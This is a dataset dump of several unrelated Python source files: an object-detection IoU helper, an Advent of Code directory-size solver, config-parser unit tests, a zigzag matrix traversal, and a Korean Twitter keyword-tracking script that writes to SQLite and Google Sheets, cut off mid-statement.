split='trainval')\ntest_dataset = VOCBboxDataset(year='2007', split='test')\n\n\ndef drawRect(img, istorch=True):\n\n i = np.array(img[0])\n if istorch:\n i = np.transpose(i, (1, 2, 0))\n for pos in img[1]:\n [y, x, yy, xx] = pos\n rectangle(i, (x, y), (xx, yy), (255, 0, 0))\n i = i[..., [2, 1, 0]]\n\n return i\n\n\ndef get_label(predict, turth):\n\n predict = np.expand_dims(predict, axis=0)\n turth = np.expand_dims(turth, axis=1)\n max = np.maximum(turth, predict)\n min = np.minimum(turth, predict)\n\n max[..., 2:4] = min[..., 2:4]\n res = max[..., 2:4] - max[..., 0:2]\n\n mask = np.where(res < 0)\n res[[mask[0]], [mask[1]], [mask[2]]] = 0\n IOU = res[..., 0] * res[..., 1]\n # print(IOU)\n turth_area = turth[..., 
2:4] - turth[..., 0:2]\n turth_area = turth_area[..., 0] * turth_area[..., 1]\n # print(turth_area)\n # prd_area = predict[..., 2:4] - predict[..., 0:2]\n # prd_area = prd_area[..., 0] * prd_area[..., 1]\n # # print(prd_area)\n total_IOU = IOU / (turth_area)# + prd_area - IOU)\n return total_IOU\n\n\nif __name__ == '__main__':\n\n print(train_dataset.shape)\n","repo_name":"long-username/-","sub_path":"pytorch-experiment/albert/python/RPN/RPN/voc_database.py","file_name":"voc_database.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35023250725","text":"class Directory:\n def __init__(self, parent=None):\n self.size = 0\n self.subDirs = []\n self.parent = parent\n\n # We completely ignore commands all '$ cd' and '$ ls', because the input file\n # is build so that is lists each directory exactly once.\n # Then also the names of directories and file names don't matter\n def makeSubTrees(self, ix: int, lines: list[str]) -> tuple[int, int]:\n \"\"\"\n Returns a tree-like structure that represents the directory hierarchically.\n Each object: (Directory) has a size: (int) and a subDirs: (list[Directory]),\n that represent child nodes in the tree(or sub directories).\n \"\"\"\n while ix < len(lines) and lines[ix][0] != '$':\n if lines[ix][0].isnumeric():\n self.size += int(lines[ix].split(' ')[0])\n else:\n self.subDirs.append(Directory(self))\n ix += 1\n\n dir: Directory\n for dir in self.subDirs:\n ix, size = dir.makeSubTrees(ix+2, lines)\n self.size += size\n\n return ix+1, self.size\n\n def sumDirsSmallerOrEqualThan(self, size: int) -> int:\n sum = 0\n dir: Directory\n for dir in self.subDirs:\n sum += dir.sumDirsSmallerOrEqualThan(size)\n\n if self.size <= size:\n sum += self.size\n\n return sum\n\n # the size to delete must be bigger than lowerThreshold, but still the smallest possible\n def findSmallestDirToDelete(self, currentMinimum: int, lowerThreshold: int) -> int:\n if self.size >= lowerThreshold and self.size < currentMinimum:\n currentMinimum = self.size\n dir: Directory\n for dir in self.subDirs:\n currentMinimum = dir.findSmallestDirToDelete(\n currentMinimum, lowerThreshold)\n\n return currentMinimum\n\n\ndef first(rootDir: Directory, limit: int) -> None:\n sum = rootDir.sumDirsSmallerOrEqualThan(limit)\n print(sum)\n\n\ndef second(rootDir: Directory, maximumDiskSpace: int, requiredSpace: int) -> None:\n # spaceToFree = required - unused\n spaceToFree = requiredSpace - (maximumDiskSpace - rootDir.size)\n sizeOfDirToDelete = rootDir.findSmallestDirToDelete(\n rootDir.size, spaceToFree)\n print(sizeOfDirToDelete)\n\n\nif __name__ == \"__main__\":\n with open('in.txt') as f:\n lines = f.read().splitlines()\n\n # make a hierarchy tree of directories from input\n rootDir = Directory()\n rootDir.makeSubTrees(2, lines)\n\n first(rootDir, 100000)\n second(rootDir, 70000000, 30000000)\n","repo_name":"krasiren/Aoc","sub_path":"2022/days 1-9/day7/day7.py","file_name":"day7.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11213189086","text":"\"\"\"tests for vak.config.train module\"\"\"\nimport unittest\nimport os\nimport shutil\nimport tempfile\nfrom configparser import ConfigParser\n\nimport vak.config.train\nimport vak.split\n\n\nHERE = os.path.dirname(__file__)\nTEST_DATA_DIR = os.path.join(HERE, '..', '..', 'test_data')\nTEST_CONFIGS_DIR = os.path.join(TEST_DATA_DIR, 
'configs')\n\n\nclass TestParseTrainConfig(unittest.TestCase):\n def setUp(self):\n _, self.tmp_train_vds_path = tempfile.mkstemp()\n _, self.tmp_val_vds_path = tempfile.mkstemp()\n self.tmp_root_dir = tempfile.mkdtemp()\n self.tmp_results_dir = tempfile.mkdtemp(dir=self.tmp_root_dir)\n\n self.config_file = os.path.join(TEST_DATA_DIR, 'configs', 'test_train_config.ini')\n self.config_obj = ConfigParser()\n self.config_obj.read(self.config_file)\n self.config_obj['TRAIN']['train_vds_path'] = self.tmp_train_vds_path\n self.config_obj['TRAIN']['val_vds_path'] = self.tmp_val_vds_path\n self.config_obj['TRAIN']['root_results_dir'] = self.tmp_root_dir\n self.config_obj['TRAIN']['results_dir_made_by_main_script'] = self.tmp_results_dir\n\n def tearDown(self):\n os.remove(self.tmp_train_vds_path)\n os.remove(self.tmp_val_vds_path)\n shutil.rmtree(self.tmp_root_dir)\n\n def test_parse_train_config_returns_TrainConfig_instance(self):\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(type(train_config_obj) == vak.config.train.TrainConfig)\n\n def test_no_networks_raises(self):\n self.config_obj.remove_option('TRAIN', 'networks')\n with self.assertRaises(KeyError):\n vak.config.train.parse_train_config(self.config_obj, self.config_file)\n\n def test_network_not_installed_raises(self):\n self.config_obj['TRAIN']['networks'] = 'NotInstalledNet, OtherNotInstalledNet'\n with self.assertRaises(TypeError):\n vak.config.train.parse_train_config(self.config_obj, self.config_file)\n\n def test_no_train_path_raises(self):\n self.config_obj.remove_option('TRAIN', 'train_vds_path')\n with self.assertRaises(KeyError):\n vak.config.train.parse_train_config(self.config_obj, self.config_file)\n\n def test_val_data_dict_path_default(self):\n self.config_obj.remove_option('TRAIN', 'val_vds_path')\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.val_vds_path is None)\n\n def test_val_step_default(self):\n self.config_obj.remove_option('TRAIN', 'val_step')\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.val_step is None)\n\n def test_save_only_single_checkpoint_default(self):\n self.config_obj.remove_option('TRAIN', 'save_only_single_checkpoint_file')\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.save_only_single_checkpoint_file is True)\n\n def test_ckpt_step_default(self):\n self.config_obj.remove_option('TRAIN', 'ckpt_step')\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.ckpt_step is None)\n\n def test_patience_default(self):\n self.config_obj.remove_option('TRAIN', 'patience')\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.patience is None)\n\n def test_normalize_spectrograms_default(self):\n self.config_obj.remove_option('TRAIN', 'normalize_spectrograms')\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.normalize_spectrograms is False)\n\n def test_use_previous_run_default(self):\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.use_train_subsets_from_previous_run is False)\n 
self.assertTrue(train_config_obj.previous_run_path is None)\n\n def test_use_previous_run_without_path_error(self):\n self.config_obj['TRAIN']['use_train_subsets_from_previous_run'] = 'True'\n with self.assertRaises(KeyError):\n vak.config.train.parse_train_config(self.config_obj, self.config_file)\n\n def test_save_transformed_data(self):\n self.config_obj['TRAIN']['save_transformed_data'] = 'True'\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.save_transformed_data is True)\n\n self.config_obj['TRAIN']['save_transformed_data'] = 'Yes'\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.save_transformed_data is True)\n\n self.config_obj['TRAIN']['save_transformed_data'] = 'False'\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.save_transformed_data is False)\n\n self.config_obj['TRAIN']['save_transformed_data'] = 'No'\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.save_transformed_data is False)\n\n def test_save_transformed_data_default(self):\n # test that save_transformed_data is added\n # and set to False, if we don't specify it\n train_config_obj = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_obj.save_transformed_data is False)\n\n def test_missing_root_results_dir_raises(self):\n self.config_obj.remove_option('TRAIN', 'root_results_dir')\n with self.assertRaises(KeyError):\n vak.config.train.parse_train_config(self.config_obj, self.config_file)\n\n def test_nonexistent_root_results_dir_raises(self):\n self.config_obj['TRAIN']['root_results_dir'] = 'obviously/non/existent/dir'\n with self.assertRaises(NotADirectoryError):\n vak.config.train.parse_train_config(self.config_obj, self.config_file)\n\n def test_no_results_dir_defaults_to_None(self):\n self.config_obj.remove_option('TRAIN', 'results_dir_made_by_main_script')\n train_config_tup = vak.config.train.parse_train_config(self.config_obj, self.config_file)\n self.assertTrue(train_config_tup.results_dirname is None)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Tubbz-alt/vak","sub_path":"tests/unit_tests/test_config/test_train.py","file_name":"test_train.py","file_ext":"py","file_size_in_byte":6641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"31249261513","text":"class zigZagTraverse:\n def __init__(self, array):\n self.array = array\n\n # Time : O(n) | Space : O(n)\n # where n = num of elements in the array\n def solution1(self):\n rows = len(self.array)\n cols = len(self.array[0])\n n = rows * cols\n row = 0\n col = 0\n result = []\n direction = 'down'\n count = 0\n\n while count < n:\n count += 1\n result.append(self.array[row][col])\n\n if row + 1 < rows and col == 0 and direction == 'down':\n # not the last row AND first column AND direction is down (also the initial cond)\n # then go down \n row += 1\n direction = 'up'\n \n elif row > 0 and col + 1 < cols and direction == 'up':\n # not the first row AND not the last column AND direction is up\n # then go up (diagonally)\n row -= 1\n col += 1\n\n elif row == 0 and col + 1 < cols and direction == 'up':\n # first row AND not the last column AND direction is up\n # then go up (horizontally)\n col += 1\n direction = 'down'\n\n elif col > 0 
and row + 1 < rows and direction == 'down':\n # not the first column AND not the last row AND direction is down\n # then go down (diagonally)\n row += 1\n col -= 1\n\n elif row + 1 < rows and col + 1 == cols and direction == 'up':\n # not the last row AND last column AND direction is up\n # then go down (straight)\n row += 1\n direction = 'down'\n\n elif row + 1 == rows and col + 1 < cols and direction == 'down':\n # last row AND not the last column AND direction is down\n # then go up (horizontally)\n col += 1\n direction = 'up'\n\n return result\n\n# --- Testing the solution -\n\narray = [\n [1, 3, 4, 10],\n [2, 5, 9, 11],\n [6, 8, 12, 15],\n [7, 13, 14, 16]\n]\n\nobj = zigZagTraverse(array)\nprint(obj.solution1())","repo_name":"SuvroBaner/software_engineering","sub_path":"algorithms/zigzag_traverse.py","file_name":"zigzag_traverse.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5404053555","text":"import sys, os\nfrom datetime import datetime, timedelta\nimport json\nimport logging\n\n# python-twitter\nimport twitter\nfrom twitter import Status\n# API KEY\nimport secrets\n# 상수\nimport constant\n\n# 공통 모듈\nimport common\n\n# 구글 스프레드시트\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n# 이메일 발송\nimport send_email\n\n### 파이썬 SQlite 라이브러리 블러오기 및 버전 확인\nimport sqlite3\nimport traceback\n\nclass twittPostInfo():\n \"\"\"\n twittInfo Class\n Author : 현이\n Data: 2021.08.31\n 사용법: 'ID', {'게시일시', '게시일자', '사용자ID', '사용자계정', '내용', '좋아요수', '리트윗수'}\n \"\"\"\n # 트윗 개수\n twitt_hourly_post_count = 0\n twitt_hourly_like_count = 0\n twitt_hourly_retw_count = 0\n\n # def __init__(self, id_str, create_at, create_date, create_hour, user_name, user_screen_name, favorite_count, retweet_count, text):\n def __init__(self, id_str, details):\n self._id_str = id_str\n self._details = details\n\n def __str__(self):\n return 'str : {} - {}'.format(self._id_str, self._details)\n\n def __repr__(self):\n return 'repr : {} - {}'.format(self._id_str, self._details)\n\n def detail_info(self):\n logger.info('Current ID : {}'.format(id(self)))\n logger.info('Twitt Detail Info : {} {}'.format(self._id_str, self._details.get('favorite_count')))\n\n def get_favorite_count(self):\n return self._details.get('favorite_count')\n\n def get_retweet_count(self):\n return self._details.get('retweet_count')\n\ndef update_twitt_detail_info(status, user_name, twitt_user_info):\n \"\"\"\n desc : Update 상세정보 - 트윗수, 좋아요수, 리트윗수\n parms: 날짜존재여부, 시간존재여부, 일시, TwittRowInfo, 계정유형(normal, ads), 일자별트윗정보, 시간별트윗정보, 계정유형별트윗정보\n \"\"\"\n twitt_detail_info = twitt_user_info.get(user_name)\n\n twitt_detail_info['write_count'] += 1\n twitt_detail_info['like_count'] += status.favorite_count\n twitt_detail_info['retwitt_count'] += status.retweet_count\n\ndef create_twitt_info(create_at, status, user_type, twitt_days_info, twitt_hours_info, twitt_user_info, **exsits):\n \"\"\"\n desc : 트윗정보 생성 - 일자별트윗정보, 시간별트윗정보, 계정유형별트윗정보, 상세트윗정보\n parms: 날짜존재여부, 시간존재여부, 일시, TwittRowInfo, 계정유형(normal, ads), 일자별트윗정보, 시간별트윗정보, 계정유형별트윗정보\n \"\"\"\n # 트윗일자\n create_at_date = create_at.strftime('%Y-%m-%d')\n\n # Create 상세정보 - 트윗수, 좋아요수\n twitt_detail_info = {\n # 트윗수\n 'write_count': 1,\n # 좋아요수\n 'like_count': status.favorite_count,\n # 리트윗수\n 'retwitt_count': status.retweet_count,\n }\n # 계정유형별 자료 추가\n twitt_user_info[user_type] = twitt_detail_info\n\n if not exsits['hour_exists']:\n # 시간별 자료 추가\n 
twitt_hours_info[create_at.strftime('%H')] = twitt_user_info\n\n if not exsits['date_exists']:\n # 일자별 자료 추가\n twitt_days_info[create_at_date] = twitt_hours_info\n\n\ndef get_search_twitt_by_keyword(twitter_api, keyword):\n # 키워드로 검색하기 - 검색어, 100건, 최근, json파일반환\n # statuses = twitter_api.GetSearch(term=keyword, count=100, result_type=\"recent\", return_json=True, since='2021-08-29', until='2021-09-01')\n statuses = twitter_api.GetSearch(term=keyword, count=100, result_type=\"recent\", return_json=True)\n\n # 검색결과 파일 저장\n file_full_path = common.resource_path('history{}{}.json').format(os.path.sep, file_name)\n outfile = open(file_full_path, 'w')\n # outfile = open(f\"{constant.C_ROOT_PATH}\\history\\{datetime.strftime(now_time, '%y%m%d%H%M%S')}.json\", 'w')\n json.dump(statuses, outfile)\n\n # 리스트 변환\n statuses = [Status.NewFromJsonDict(x) for x in statuses.get('statuses', '')]\n\n return statuses\n\ndef main(keyword):\n # twitter api 연동시작\n twitter_api = twitter.Api(consumer_key=secrets.TWITTER_CONSUMER_KEY,\n consumer_secret=secrets.TWITTER_CONSUMER_SECRET, \n access_token_key=secrets.TWITTER_ACCESS_TOKEN, \n access_token_secret=secrets.TWITTER_ACCESS_SECRET)\n\n # 키워드로 검색하기\n statuses = get_search_twitt_by_keyword(twitter_api, keyword)\n\n # 일자별 트윗 정보 {'일자' : {'시간': {'캠페인': {'게시글수':0, '좋아요수':0, '리트윗수':0}}}}\n twitt_days_info = {}\n\n # 검색 내용 출력\n for status in statuses:\n\n # 트윗일시\n create_at = datetime.strptime(status.created_at,'%a %b %d %H:%M:%S +0000 %Y') + timedelta(hours=9)\n # 트윗일자\n create_at_date = create_at.strftime('%Y-%m-%d')\n\n # 광고성 계정인지 확인\n filter_list = [element for element in constant.C_FILTER_KEYWORD if(element in status.user.name)]\n # 계정\n user_type = 'ads' if bool(filter_list) is True else 'normal'\n\n try:\n # 데이터 삽입\n db.execute(\"INSERT INTO SNS_EPIMINT(CAMPAIGN, COLLECT_AT, ID, CREATE_AT, USER_NAME, USER_SCREEN_NAME, TEXT, FAVORITE_COUNT, RETWEET_COUNT, HASHTAGS, SEARCH_QUERY, REMARK) \\\n VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\", \\\n ( campaign\n , datetime.strptime('20{}'.format(file_name),'%Y%m%d%H%M%S')\n , status.id_str\n , create_at\n , status.user.name\n , status.user.screen_name\n , status.text\n , status.favorite_count\n , status.retweet_count\n , ', '.join(map(str, [ h.text for h in status.hashtags if len(status.hashtags) > 0]))\n , keyword\n , None\n ))\n\n except sqlite3.Error as er:\n logger.error('SQLite error: %s' % (' '.join(er.args)))\n logger.error(\"Exception class is: \", er.__class__)\n logger.error('SQLite traceback: ')\n exc_type, exc_value, exc_tb = sys.exc_info()\n logger.error(traceback.format_exception(exc_type, exc_value, exc_tb))\n\n # 일자별 트윗 정보가 존재하는지 확인\n if create_at_date in twitt_days_info:\n ##### 일자별 트윗 정보 존재\n # 일자별 정보 가져오기\n twitt_hours_info = twitt_days_info.get(create_at_date)\n\n # 시간별 트윗 정보가 존재하는지 확인\n if create_at.strftime('%H') in twitt_hours_info:\n ##### 시간별 트윗 정보가 존재\n twitt_user_info = twitt_hours_info.get(create_at.strftime('%H'))\n \n # 사용자가 이미 저장되었는지 확인\n if user_type in twitt_user_info:\n # 상세정보 업데이트 - 트윗수, 좋아요수, 리트윗수\n update_twitt_detail_info(status, user_type, twitt_user_info)\n \n else:\n # 일자별, 시간별, 사용자별 자료 생성\n create_twitt_info(create_at, status, user_type, twitt_days_info, twitt_hours_info, twitt_user_info, date_exists=True, hour_exists=True)\n\n else:\n ##### 시간별 트윗 정보가 미존재\n # 새로운 시간을 위한 정보\n twitt_user_info = {}\n\n # 일자별, 시간별, 사용자별 자료 생성\n create_twitt_info(create_at, status, user_type, twitt_days_info, twitt_hours_info, twitt_user_info, date_exists=True, hour_exists=False)\n \n else:\n ##### 
일자별 트윗 정보 미존재\n twitt_user_info = {}\n twitt_hours_info = {}\n\n # 일자별, 시간별, 사용자별 자료 생성\n create_twitt_info(create_at, status, user_type, twitt_days_info, twitt_hours_info, twitt_user_info, date_exists=False, hour_exists=False)\n\n # # logger.info(status)\n logger.info('create_at : ' + str(create_at))\n logger.info('id_str : ' + status.id_str)\n logger.info('name : ' + status.user.name)\n logger.info('screen_name : ' + status.user.screen_name)\n logger.info('favorite_count : ' + str(status.favorite_count))\n logger.info('retweet_count : ' + str(status.retweet_count))\n logger.info('text : ' + status.text)\n logger.info('hashtags : ' + ', '.join(map(str, [ h.text for h in status.hashtags if len(status.hashtags) > 0])))\n # logger.info(status.text.encode('utf-8'))\n logger.info('--------------------------------------------------')\n\n logger.info(f\"검색어 '{keyword}'로 검색된 건수 : {len(statuses)}건\")\n logger.info(twitt_days_info)\n # logger.info('-------------')\n # logger.info(list(twitt_days_info.items()))\n\n # 자료 저장(스프레드시트) 및 메일 발송(gmail)\n save_data_on_spreadsheet(twitt_days_info)\n\ndef save_data_on_spreadsheet(twitt_days_info):\n \"\"\"구글스프레드시트 저장\"\"\"\n scope = [\n 'https://spreadsheets.google.com/feeds',\n 'https://www.googleapis.com/auth/drive',\n ]\n\n json_file_path = common.resource_path(constant.C_GOOGLE_API_KEY_FILENAME)\n\n credentials = ServiceAccountCredentials.from_json_keyfile_name(json_file_path, scope)\n gc = gspread.authorize(credentials)\n\n # 스프레스시트 문서 가져오기 \n doc = gc.open_by_url(constant.C_SPREADSHEET_URL)\n\n # 스프레드시트 문서명\n # worksheetName = f'{now_time.year}{str(now_time.month).zfill(2)}'\n # worksheetName_daily = f'{now_time.year}{str(now_time.month).zfill(2)}_일자별'\n worksheetName = constant.C_SPREADSHEET_SHEET_NAME_HOURLY\n worksheetName_daily = constant.C_SPREADSHEET_SHEET_NAME_DARILY\n\n # 시트 선택하기\n worksheet = doc.worksheet(worksheetName)\n worksheet_daily = doc.worksheet(worksheetName_daily)\n\n # # 1일이면 시트 생성\n # if now_time.day == 1:\n # # 시트 생성\n # worksheet = doc.add_worksheet(title=worksheetName, rows='1000', cols='22')\n # worksheet_daily = doc.add_worksheet(title=worksheetName_daily, rows='1000', cols='22')\n # # 타이틀 추가\n # worksheet.append_row(constant.C_SPREADSHEET_TITLE1)\n # worksheet_daily.append_row(constant.C_SPREADSHEET_TITLE2)\n\n # 시트 자료 가져오기\n worksheet_datas = worksheet.get_all_records()\n worksheet_datas_daily = worksheet_daily.get_all_records()\n\n # 신규 행 추가 필요 여부\n new_row_yn = True\n # 트윗수 누적, 좋아요수 누적, 리트윗수 누적\n write_count_cumul = 0\n like_count_cumul = 0\n retwitt_count_cumul = 0\n write_count_cumul_prev = 0\n like_count_cumul_prev = 0\n retwitt_count_cumul_prev = 0\n\n # 스프레드 마지막 시트 자료\n worksheet_data_last = worksheet_datas[len(worksheet_datas) - 1]\n\n # 전일 정보\n last_row_list = [worksheet_data for worksheet_data in worksheet_datas\n if (datetime.strftime(now_time + timedelta(days=-1), '%Y-%m-%d') in worksheet_data['게시일자'])]\n\n # 전일 마지막 행\n last_row = last_row_list[len(last_row_list) - 1]\n\n # 스프레드시트 작성\n for post_date, hour_data in sorted(twitt_days_info.items()):\n # logger.info(post_date, hour_data)\n for post_hour, campaign_data in sorted(hour_data.items()):\n # logger.info(post_date, post_hour, campaign_data)\n for campaign, post_data in campaign_data.items():\n\n # 추가 작성 필요 여부\n appendYN = True\n\n # 이전일자 - 기본 값\n prev_post_date = '1111-01-01'\n # 일자 개수\n day_count = 0\n\n # 스프레드시트 내용 확인\n for worksheet_data in worksheet_datas:\n\n day_count = day_count + 1 if prev_post_date == worksheet_data['게시일자'] else 0\n prev_post_date = 
worksheet_data['게시일자']\n # 스프레드시트 행 수 ( +2 : 인덱스 0부터 시작 / 타이틀 )\n rowCnt = worksheet_datas.index(worksheet_data) + 2\n\n # 스프레드시트의 일자/시간과 수집한 일자/시간과 일치하는지 확인\n if (worksheet_data['게시일자'] == str(post_date) and\n worksheet_data['시간(24시)'] == int(post_hour) and\n worksheet_data['채널'] == campaign):\n ##### 업데이트 필요\n # 같은 일자 누적 자료 갱신\n # if (datetime.strptime(worksheet_data['게시일자'], '%Y-%m-%d')\n if (datetime.strptime(post_date, '%Y-%m-%d')\n == datetime.strptime(datetime.strftime(now_time, '%Y-%m-%d'), '%Y-%m-%d') + timedelta(days=-1)):\n # print(datetime.strptime(worksheet_data['게시일자'], '%Y-%m-%d'))\n # print(datetime.strptime(datetime.strftime(now_time, '%Y-%m-%d'), '%Y-%m-%d') + timedelta(days=-1))\n # 하루 전 합계\n write_count_cumul_prev += list(post_data.values())[0]\n like_count_cumul_prev += list(post_data.values())[1]\n retwitt_count_cumul_prev += list(post_data.values())[2]\n\n # 같은 일자 누적 자료 갱신\n if (datetime.strptime(worksheet_data['게시일자'], '%Y-%m-%d')\n == datetime.strptime(worksheet_data_last['게시일자'], '%Y-%m-%d')):\n # == datetime.strptime(datetime.strftime(now_time, '%Y-%m-%d'), '%Y-%m-%d')):\n if day_count == 0:\n # print(\"0 - worksheet_data['시간(24시)']\" + str(worksheet_data['시간(24시)']))\n # 일자의 첫번째 시간 : 시점과 동일\n write_count_cumul = list(post_data.values())[0]\n like_count_cumul = list(post_data.values())[1]\n retwitt_count_cumul = list(post_data.values())[2]\n else:\n # print(\"else - worksheet_data['시간(24시)']\" + str(worksheet_data['시간(24시)']))\n # 일자의 두번째 이상 시간 : 누적\n write_count_cumul += list(post_data.values())[0]\n like_count_cumul += list(post_data.values())[1]\n retwitt_count_cumul += list(post_data.values())[2]\n\n # 마지막 열이 신규 게시물로 인해 추가된 행이 아닌 경우 업데이트\n if (worksheet_datas.index(worksheet_data) + 1 == len(worksheet_datas) and\n worksheet_data['수집일시'] == '{} {}'.format(worksheet_data['게시일자'], str(worksheet_data['시간(24시)']).zfill(2))):\n # print(worksheet_data['게시일자'], ' ', worksheet_data['시간(24시)'])\n # 수집일시 업데이트\n worksheet.update_acell(f'A{rowCnt}', datetime.strftime(now_time, '%Y-%m-%d %H'))\n # 신규행 추가 불필요\n new_row_yn = False\n\n # 여러셀 업데이트\n cell_list = worksheet.range('E{}:L{}'.format(rowCnt, rowCnt))\n\n cell_values = [list(post_data.values())[0],\n list(post_data.values())[1],\n list(post_data.values())[2],\n write_count_cumul,\n like_count_cumul,\n retwitt_count_cumul,\n like_count_cumul_prev - last_row['좋아요 누적수(D)'],\n retwitt_count_cumul_prev - last_row['리트윗 누적수(D)']\n ]\n\n for i, val in enumerate(cell_values):\n cell_list[i].value = val\n\n worksheet.update_cells(cell_list)\n\n # 신규 추가 여부\n appendYN = False\n\n # 스프레드시트 열\n colName = \"M\"\n\n # 게시일자 + n일이 수집일자와 같은지 확인\n for i in range(0, 10):\n if (datetime.strptime(worksheet_data['게시일자'], '%Y-%m-%d') + timedelta(days=i+1) ==\n datetime.strptime(datetime.strftime(now_time, '%Y-%m-%d'), '%Y-%m-%d') ):\n # logger.info('게시일자 + {}일이 수집일자와 동일'.format(i+1))\n colName = chr(ord(colName) + i)\n\n # 스프레드시트 작성 - 좋아요수 + 리트윗수\n # print(f'{colName}{rowCnt}', list(post_data.values())[1] + list(post_data.values())[2])\n worksheet.update_acell(f'{colName}{rowCnt}', list(post_data.values())[1] + list(post_data.values())[2])\n\n pass\n\n if appendYN == True:\n ##### 신규 건 스프레드시트 작성\n # print('appendYN == True')\n # 신규 행 추가 필요 여부\n new_row_yn = False\n\n # # 트윗수 누적\n # write_count_cumul += worksheet_data_last['게시물 누적수(D)'] if worksheet_data_last['게시일자'] == str(post_date) else 0\n # # 좋아요수 누적\n # like_count_cumul += worksheet_data_last['좋아요 누적수(D)'] if worksheet_data_last['게시일자'] == str(post_date) else 0\n # # 리트윗수 누적\n # 
retwitt_count_cumul += worksheet_data_last['리트윗 누적수(D)'] if worksheet_data_last['게시일자'] == str(post_date) else 0\n\n # print('신규 건 존재')\n worksheet.append_row([\n datetime.strftime(now_time, '%Y-%m-%d %H')\n , str(post_date)\n , str(post_hour)\n , str(campaign)\n , list(post_data.values())[0]\n , list(post_data.values())[1]\n , list(post_data.values())[2]\n , (write_count_cumul if str(post_date) == worksheet_data_last['게시일자'] else 0) + list(post_data.values())[0]\n , (like_count_cumul if str(post_date) == worksheet_data_last['게시일자'] else 0) + list(post_data.values())[1]\n , (retwitt_count_cumul if str(post_date) == worksheet_data_last['게시일자'] else 0) + list(post_data.values())[2]\n , like_count_cumul_prev - last_row['좋아요 누적수(D)']\n , retwitt_count_cumul_prev - last_row['리트윗 누적수(D)']\n , \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\"\n , \"신규 게시글\"\n ])\n\n if new_row_yn:\n # print('last_write_count_cumul : ' + str(write_count_cumul))\n # print('last_like_count_cumul : ' + str(like_count_cumul))\n # print('last_retwitt_count_cumul : ' + str(retwitt_count_cumul))\n if (worksheet_data_last['게시물 누적수(D)'] == write_count_cumul and\n worksheet_data_last['좋아요 누적수(D)'] == like_count_cumul and\n worksheet_data_last['리트윗 누적수(D)'] == retwitt_count_cumul and\n worksheet_data_last['좋아요 발생'] == like_count_cumul_prev - last_row['좋아요 누적수(D)'] and\n worksheet_data_last['리트윗 발생'] == retwitt_count_cumul_prev - last_row['��트윗 누적수(D)']):\n # print(\"same\")\n pass\n else:\n # print(\"diff\")\n worksheet.append_row([\n datetime.strftime(now_time, '%Y-%m-%d %H')\n , datetime.strftime(now_time, '%Y-%m-%d')\n , datetime.strftime(now_time, '%H')\n , 'normal'\n , 0\n , 0\n , 0\n , write_count_cumul if datetime.strftime(now_time, '%Y-%m-%d') == worksheet_data_last['게시일자'] else 0\n , like_count_cumul if datetime.strftime(now_time, '%Y-%m-%d') == worksheet_data_last['게시일자'] else 0\n , retwitt_count_cumul if datetime.strftime(now_time, '%Y-%m-%d') == worksheet_data_last['게시일자'] else 0\n , like_count_cumul_prev - last_row['좋아요 누적수(D)']\n , retwitt_count_cumul_prev - last_row['리트윗 누적수(D)']\n , \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\"\n , \"신규 좋아요 또는 리트윗\"\n ])\n\n ##### 일자별 Twitt 추이 작성\n # db 조회\n query = open(common.resource_path('emws_day.sql'), 'r', encoding='UTF-8').read()\n db.execute(query)\n\n retrieve_rows = db.fetchall()\n # for retrieve_row in retrieve_rows:\n # print('db', retrieve_row)\n # print('retrieve_row[0]', retrieve_row[0])\n\n # db에서 조회된 자료중 오늘날짜 자료\n summary_today_db = [retrieve_row for retrieve_row in retrieve_rows if (datetime.strftime(now_time, '%Y-%m-%d') in retrieve_row[0])]\n # print(summary_today_db)\n\n # 구글스프레드시트 조회된 자료중 오늘날짜 자료\n summary_today_sheet = [element for element in worksheet_datas_daily if (summary_today_db[0][0] in element['수집일자'])]\n # print(summary_today_sheet)\n\n # db에서 오늘날짜 자료가 있는지 확인\n if len(summary_today_sheet) > 0:\n # print('summary_today', summary_today)\n\n # 스프레드시트 행\n rowCnt2 = worksheet_datas_daily.index(summary_today_sheet[0]) + 2\n\n # 여러셀 업데이트\n cell_list2 = worksheet.range('B{}:D{}'.format(rowCnt2, rowCnt2))\n \n cell_values2 = [summary_today_db[0][2]\n , summary_today_db[0][3]\n , summary_today_db[0][4]\n ]\n \n for i, val in enumerate(cell_values2):\n cell_list2[i].value = val\n\n # 스프레드시트 업데이트\n # print('update_cells', cell_list2)\n worksheet_daily.update_cells(cell_list2)\n else:\n # 스프레드시트 행 추가\n # print('append_row', summary_today_db)\n worksheet_daily.append_row([\n summary_today_db[0][0]\n , summary_today_db[0][2]\n , 
